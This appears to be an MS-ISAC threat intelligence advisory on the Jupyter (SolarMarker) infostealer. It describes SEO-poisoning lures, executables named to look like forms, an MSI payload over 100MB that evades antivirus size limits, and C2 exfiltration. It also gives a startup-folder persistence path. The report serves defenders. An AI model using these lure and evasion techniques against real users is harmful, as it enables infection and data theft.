The Multi-State Information Sharing and Analysis Center (MS-ISAC) Cyber Threat Intelligence Team (CTI) assesses with moderate confidence that Jupyter, a highly evasive and adaptive .NET infostealer, will continue to opportunistically target state, local, tribal, and territorial (SLTT) organizations. Cyber Threat Actors (CTAs) have deployed Jupyter widely, leveraging SEO-poisoning to create watering hole sites, increasingly infecting SLTT entities since September. Recommendations to better secure your organization are at the end of this report.
Jupyter (aka SolarMarker) deploys a multi-stage process, leveraging PowerShell and legitimate tools, such as Slim PDF Reader, to drop secondary payloads to fingerprint victim information, including computer name, OS version, architecture, permissions, and user identifier.1 Jupyter is likely impacting SLTTs as part of a broader opportunistic effort, since the malware is affecting an array of sectors, including finance, healthcare, and education.2 Following aspike in activity during the fall, SLTT-Jupyter infections subsided with no incidents in December and a small resurgence through this past month.
The MS-ISAC determined SLTT victims became aware of infections when their endpoint detection and response services (EDR) alerted on unauthorized PowerShell commands attempting to communicate with command and control (C2) traffic. The MS-ISAC continues to investigate why Jupyter operators are harvesting victim information, granting CTAs commonly leveraged infostealers for financial gain and intellectual property theft. Security researchers have observed the Jupyter operators adapting their techniques, tactics, and procedures (TTPs) and malware frequently, so intrusion details are likely to vary across infections.
Despite the irregularity in Jupyter TTPs, several features are common among public-sourced and MS-ISAC-observed breaches. Prior to infection, the Jupyter operators inject over 2,000 keywords to push malicious Google and WordPress3 sites up search engine rankings, using a technique known as SEO-poisoning,4 thereby increasing the likelihood that an unsuspecting user will visit the page. Analysis of an SLTT Jupyter incident revealed that the initial infection occurred after an end-user attempted to download a malicious file embedded with an executable off a compromised website form. The malicious documents will often feature an unassuming name, such as ‘Assignment-Of-Proprietary-Lease-Form-.exe’ to lure users into interacting with it. The installer launches the malicious executable and then Nitro Pro 13 will execute an over 100MB MSI payload, allowing it to bypass antivirus software due to file size limitations.
All observed attacks have shared the objective of harvesting and communicating victim information, including from BIOS and browser, to a C2 address. Appendix “Figure 2” depicts Jupyter’s commonly observed four-stage infection chain, starting with the web-hosted malicious executable.
AppData\Local\Temp\ .\Users\’username’\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
T1041 Exfiltration Over C2 Channel
Analytic confidence in this assessment is moderate. Source reliability is moderate with several conflicts among sources, the CTI team attributes to Jupyter’s evolving tactics and infrastructure, as well as variation across security researcher methodology. The analyst used a Circleboard, Timeline, and Key Assumptions Check to perform this analysis.
For questions or comments, please contact us at [email protected].